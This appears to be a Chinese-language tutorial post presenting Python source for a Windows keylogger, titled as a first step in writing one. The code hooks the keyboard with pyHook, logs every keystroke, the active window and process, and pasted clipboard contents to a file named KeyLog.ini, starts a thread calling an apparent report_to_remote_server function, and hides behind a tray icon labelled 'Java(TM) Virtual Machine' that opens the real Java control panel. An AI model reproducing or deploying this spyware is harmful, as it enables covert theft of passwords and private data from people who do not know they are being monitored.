py编写键盘记录器初步
- 调用win32 API记录键盘事件、窗口事件
#
def get_current_process():
# 获取最上层的窗口句柄
hwnd = user32.GetForegroundWindow()
# 获取进程ID
pid = c_ulong(0)
user32.GetWindowThreadProcessId(hwnd,byref(pid))
# 将进程ID存入变量中
process_id = "%d" % pid.value
# 申请内存
executable = create_string_buffer("\x00"*512)
h_process = kernel32.OpenProcess(0x400 | 0x10,False,pid)
psapi.GetModuleBaseNameA(h_process,None,byref(executable),512)
# 读取窗口标题
windows_title = create_string_buffer("\x00"*512)
length = user32.GetWindowTextA(hwnd,byref(windows_title),512)
# 打印
# print
# print "[ PID:%s-%s-%s]" % (process_id,executable.value,windows_title.value)
# print
Thread(target=report_to_remote_server).start()
output_file('','KeyLog.ini',"\n[ PID:%s-%s-%s] %s\n" % (process_id,executable.value,windows_title.value,time.strftime("%Y/%m/%d %H:%M:%S")));
# 关闭handles
kernel32.CloseHandle(hwnd)
kernel32.CloseHandle(h_process)
# 定义击键监听事件函数
def KeyStroke(event):
global current_window
# 检测目标窗口是否转移(换了其他窗口就监听新的窗口)
if event.WindowName != current_window:
current_window = event.WindowName
# 函数调用
get_current_process()
# 检测击键是否常规按键(非组合键等)
if event.Ascii > 32 and event.Ascii <127:
# print chr(event.Ascii),
output_file('','KeyLog.ini',chr(event.Ascii))
else:
# 如果发现Ctrl+v(粘贴)事件,就把粘贴板内容记录下来
if event.Key == "V":
win32clipboard.OpenClipboard()
pasted_value = win32clipboard.GetClipboardData()
win32clipboard.CloseClipboard()
# print "[PASTE]-%s" % (pasted_value),
output_file('','KeyLog.ini',"[PASTE]-%s" % (pasted_value))
else:
# print "[%s]" % event.Key,
output_file('','KeyLog.ini',"[%s]" % event.Key)
# 循环监听下一个击键事件
return True
def RegisterKeyListener():
# 创建并注册hook管理器
kl = pyHook.HookManager()
kl.KeyDown = KeyStroke
# 注册hook并执行
kl.HookKeyboard()
pythoncom.PumpMessages()
但是对于QQEdit.exe,记录值会受到干扰。
- 日志记录
def output_file(dir,name,content):
fileName = ''
if len(dir)>0:
fileName = fileName+dir + "/"
fileName = fileName + name#.encode('utf-8','ignore')
f = open(fileName,"a")
f.write(content)
# print "Output file",fileName
- Tk GUI
支持异步多线程操作的UI库
class Tk_App:
def __init__(self,master):
#构造函数里传入一个父组件(master),创建一个Frame组件并显示
frame = Frame(master)
frame.pack()
#创建两个button,并作为frame的一部分
self.button = Button(frame, text="QUIT", fg="red", command=sys.exit)# frame.quit
self.button.pack(side=LEFT) #此处side为LEFT表示将其放置 到frame剩余空间的最左方
self.hi_there = Button(frame, text="Hello", command=self.say_hi)
self.hi_there.pack(side=LEFT)
# Thread(target=RegisterKeyListener).start()
# sys.stdout.flush()
def say_hi(self):
print "hi there, this is a class example!"
TRAY_TOOLTIP = 'Java(TM) Virtual Machine'
TRAY_ICON = 'icon.png'
def create_menu_item(menu, label, func):
item = wx.MenuItem(menu, -1, label)
menu.Bind(wx.EVT_MENU, func, id=item.GetId())
menu.AppendItem(item)
return item
class TaskBarIcon(wx.TaskBarIcon):
def __init__(self,frame):
self.frame=frame
super(TaskBarIcon, self).__init__()
self.set_icon(TRAY_ICON)
self.Bind(wx.EVT_TASKBAR_LEFT_DOWN, self.on_left_down)
mainth.start();
def CreatePopupMenu(self):
menu = wx.Menu()
# create_menu_item(menu, 'Say Hello', self.on_hello)
create_menu_item(menu,'Control Panel',self.on_control);
menu.AppendSeparator()
create_menu_item(menu, 'Exit', self.on_exit)
# create_menu_item(menu, 'Exit', sys.exit)
return menu
def set_icon(self, path):
icon = wx.IconFromBitmap(wx.Bitmap(path))
self.SetIcon(icon, TRAY_TOOLTIP)
def on_left_down(self, event):
print 'Tray icon was left-clicked.'
def on_hello(self, event):
print 'Hello, world!'
def on_control(self,event):
# print r'"%JAVA_HOME%\jre\bin\javacpl.exe"'
# os.system(r'cd /d %JAVA_HOME%');
os.system(r'""%JAVA_HOME%\jre\bin\javacpl.exe""');
# print os.path.realpath(sys.argv[0])
# print os.path.dirname(sys.argv[0])
# print os.path.basename(sys.argv[0])
def on_exit(self, event):
wx.CallAfter(self.Destroy)
self.frame.Close()
mainth._Thread__stop()
# sys.exit()
class App(wx.App):
def OnInit(self):
frame=wx.Frame(None)
self.SetTopWindow(frame)
TaskBarIcon(frame)
return True